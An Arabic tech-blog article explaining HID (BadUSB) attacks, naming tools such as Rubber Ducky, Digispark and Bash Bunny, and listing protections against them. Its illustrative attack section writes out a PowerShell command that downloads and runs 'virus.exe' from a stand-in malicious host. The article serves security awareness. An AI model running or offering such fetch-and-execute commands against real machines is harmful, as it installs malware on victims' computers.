مدونة نانو تك
  • الرئيسية
  • التصنيفات
    • أبحاث علمية تقنية
    • أخبار التكنولوجيا والتقنية
    • أخبار لغات البرمجة وأطر العمل
    • أفكار مشاريع تخرج IT
    • افضل ادوات وبرامج الذكاء الاصطناعي
    • تصميم وبرمجة المواقع والمتاجر الإلكترونية
    • تقنية معلومات وعلوم حاسوب
    • حراج بيع وشراء
    • عناوين مشاريع تقنية مبتكرة
    • مشاريع انظمة تعليمية واكاديمية
    • مشاريع تخرج تقنية مبتكرة 2026
    • مقالات برمجية وتقنية
    • مواضيع تقنية
  • الاخبار
  • الصور
  • الفيديوهات
  • للتواصل
مدونة نانو تك
  • الرئيسية
  • التصنيفات
    • أبحاث علمية تقنية
    • أخبار التكنولوجيا والتقنية
    • أخبار لغات البرمجة وأطر العمل
    • أفكار مشاريع تخرج IT
    • افضل ادوات وبرامج الذكاء الاصطناعي
    • تصميم وبرمجة المواقع والمتاجر الإلكترونية
    • تقنية معلومات وعلوم حاسوب
    • حراج بيع وشراء
    • عناوين مشاريع تقنية مبتكرة
    • مشاريع انظمة تعليمية واكاديمية
    • مشاريع تخرج تقنية مبتكرة 2026
    • مقالات برمجية وتقنية
    • مواضيع تقنية
  • الاخبار
  • الصور
  • الفيديوهات
  • للتواصل
تطبيق_App_Food من نانوسوفت

التصنيفات

  • مواضيع تقنية 77
  • أفكار مشاريع تخرج IT 33
  • مقالات برمجية وتقنية 125
  • أخبار التكنولوجيا والتقنية 74
  • أخبار لغات البرمجة وأطر العمل 31
  • أبحاث علمية تقنية 23
  • حراج بيع وشراء 2
  • تقنية معلومات وعلوم حاسوب 1
  • عناوين مشاريع تقنية مبتكرة 4
  • تصميم وبرمجة المواقع والمتاجر الإلكترونية 3
  • مشاريع انظمة تعليمية واكاديمية 1
  • مشاريع تخرج تقنية مبتكرة 2026 5
  • افضل ادوات وبرامج الذكاء الاصطناعي 7

الهاشتاجات

ابحاث علمية تقنية 25 اخبار الذكاء الاصطناعي ولغات البرمجة 9 افضل الانظمة والبرمجيات 1 افضل تخصصات تقنية معلومات وحاسوب 2 افكار مشاريع تخرج تقنية 41 التقنية والتكنولوجياء 176 تطبيقات ومواقع الكترونية احترافية 7 مشاريع تقنية 13 مقالات عامة 1

البومات الصور

89 صور
مارس 13, 2025
21 صور
سبتمبر 10, 2024
17 صور
مارس 16, 2023

Posted in مقالات برمجية وتقنية, مواضيع تقنية on أغسطس 04, 2025

ماهي هجمات HID

ماهي هجمات HID🤔؟

👈هجمات HID هي نوع من الهجمات السيبرانية التي تستخدم أجهزة صغيرة تشبه الفلاشات لتنفيذ هجمات خفية على الأجهزة. هذه الأجهزة يمكنها أن تنسخ كلمات السر والمعلومات الحساسة من جهازك، وتفتح "باب خلفي" يسمح للمخترق بالدخول متى شاء، وتنفذ أوامر معقدة تلقائيًا خلال ثوانٍ على جهازك.


ما هي هجمات HID؟

هجمات HID هي نوع من الهجمات الفيزيائية يتم فيها استخدام جهاز USB يبدو بريئًا (مثل فلاش ميموري أو شاحن USB)، ولكنه مبرمج ليعمل كأنه لوحة مفاتيح تُدخل أوامر خبيثة بسرعة بمجرد توصيله بالحاسوب.


👉 الهدف من الهجوم:

تنفيذ أوامر برمجية خبيثة (مثل فتح Terminal وتحميل فيروسات).

سرقة بيانات.

تعطيل النظام.

فتح "باب خلفي" (Backdoor) للمخترق.

💻 كيف تتم الهجمة؟

1. المهاجم يُبرمج جهاز USB خبيث باستخدام أدوات مثل:

Rubber Ducky

DigiSpark

Arduino HID devices


2. عند توصيل هذا الجهاز بجهاز الضحية، يتعرف عليه النظام كـ "لوحة مفاتيح".


3. يبدأ الجهاز بإدخال أوامر تلقائيًا بسرعات لا يمكن للمستخدم ملاحظتها أو إيقافها (في خلال ثوانٍ).

4. تنفذ الأوامر مثل:

فتح نافذة الأوامر (CMD أو Terminal).

تحميل ملفات خبيثة من الإنترنت.

تثبيت أدوات مراقبة أو برمجيات تجسس.

إنشاء مستخدم جديد بصلاحيات المدير.


🎯 أمثلة على أدوات تنفذ هجمات HID:


الأداةالوصف

Rubber Duckyجهاز يشبه فلاش USB لكنه يعمل كلوحة مفاتيح، يُبرمج بلغة بسيطة لإرسال الأوامر.

Digisparkلوحة إلكترونية صغيرة قابلة للبرمجة لتعمل كجهاز HID.

Arduino Leonardo / Microلوحات قابلة للبرمجة تستخدم في محاكاة لوحة المفاتيح/الفأرة.

BadUSBتقنية أوسع تشمل تعديل Firmware للفلاشات لتتصرف كسلوك مختلف تمامًا، مثل HID.


🎯 أمثلة على هجوم فعلي:


تخيل أنك تعمل على جهاز حاسوب في مكان عام أو داخل شركة، ويأتي شخص ما ويقول لك:

"هل يمكنني شحن هاتفي هنا؟"

فيعطيك شاحن USB أو جهاز صغير لتوصله… بمجرد التوصيل، الجهاز يعمل كلوحة مفاتيح، ويقوم بـ:

start cmd

powershell Invoke-WebRequest -Uri http://malicious.link -OutFile virus.exe

start virus.exe


كل هذا يحدث في ثوانٍ قليلة بدون أي تفاعل منك.


🛡️ كيف تحمي نفسك من هجمات HID؟


1. لا توصل أي جهاز USB غريب أو غير معروف المصدر بجهازك.


2. فعّل إعدادات تأمين USB من BIOS/UEFI (تعطيل HID عند الإقلاع).

3. استخدم برامج مراقبة مدخلات USB مثل:

USBDeview

G Data USB Keyboard Guard


4. تقييد صلاحيات الأجهزة الجديدة في أنظمة تشغيل المؤسسات.

5. استخدم أجهزة USB موثوقة فقط، خاصة في بيئات العمل.

6. تثبيت برامج الحماية التي ترصد نشاط الأوامر التلقائية.

☝️أداة Bash Bunny: جهاز اختراق متكامل

أداة Bash Bunny هي واحدة من هذه الأجهزة التي تشبه الفلاشات العادية، ولكنها في الواقع جهاز اختراق متكامل. يمكنها أن تنفذ هجمات خفية على الأجهزة، وتنسخ كلمات السر والمعلومات الحساسة، وتفتح "باب خلفي" يسمح للمخترق بالدخول متى شاء.


✌️برمجة الفلاشات العادية

يمكن برمجة فلاشة عادية لتقوم بنفس الوظيفة تقريبًا، مما يزيد من خطورة هذه الهجمات.


👌حماية الأجهزة

- تجنب استخدام الفلاشات غير المعروفة.

- استخدم برامج الحماية والكشف عن الفيروسات.

- قم بتحديث نظام التشغيل والبرامج بانتظام.

- استخدم كلمات مرور قوية ومتغيرة.


👏الوعي السيبراني

يجب أن تكون حذرًا عند استخدام الأجهزة والفلاشات، وعدم الثقة في أي شيء يبدو مألوفًا. يجب أن تكون على دراية بالتهديدات السيبرانية وكيفية حماية نفسك منها.


أغسطس 04, 2025 in مقالات برمجية وتقنية, مواضيع تقنية
Tags # التقنية والتكنولوجياء

Related posts

شركة Google تنافس Duolingo بأداة جديدة لتعليم اللغة الإنجليزية معالج intel Pentium طرق التواصل بين الأجهزة Communication Methods التحويل الى الوضع الصامت اثناء اوقات الصلاة . أنواع كروت الشاشة اختصارات لوحة المفاتيح لتطبيق الحسابة أنواع الفيروسات أنواع انظمة التشغيل افضل framework في تصميم الواجهات ماهي تقنية البلوكتشين

  • القائمة
  • الرئيسية
  • التصنيفات
    أبحاث علمية تقنية أخبار التكنولوجيا والتقنية أخبار لغات البرمجة وأطر العمل أفكار مشاريع تخرج IT افضل ادوات وبرامج الذكاء الاصطناعي تصميم وبرمجة المواقع والمتاجر الإلكترونية تقنية معلومات وعلوم حاسوب حراج بيع وشراء عناوين مشاريع تقنية مبتكرة مشاريع انظمة تعليمية واكاديمية مشاريع تخرج تقنية مبتكرة 2026 مقالات برمجية وتقنية مواضيع تقنية
  • الاخبار
  • الصور
  • الفيديوهات
  • للتواصل

يمكنكم التواصل معنا عن طريق :

العنوان
Yemen IBB
الهاتف +967770529482
967770177866+
البريد info@nano2soft.com

كما يمكنكم زيارتنا على مواقع التواصل التالية

مدونة نانو تك © 2020 -
تطوير Nano 2 Soft
الهاتف 00967770529482
البريد info@nano2soft.com website https://nano2soft.com